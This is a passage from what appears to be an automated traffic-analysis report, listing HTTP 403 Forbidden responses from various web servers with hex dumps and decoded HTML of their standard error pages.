61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:12 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:12 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMf498VbANTSyYg//oIwpa8Y,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1678431372.474607756121726705X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:12 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: c6Zv9Hz2/K0IystS7Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:12 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:12 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: Bg9OCvhm/56OCaJcQData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:12 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: RQvnDyN5n1orR2cJk2hJbg==,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVhhGDbhQupWPplYpg0XSrHk,m0j2EEknGIVUW/liY8BLLseIu4dGXwqDk+m1otFKtK9sl0ueLMGCVziLUYuJmnC9X-Wix-Request-Id: 1678431372.902200829560889273X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:59:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15012X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveKeep-Alive: timeout=5Vary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 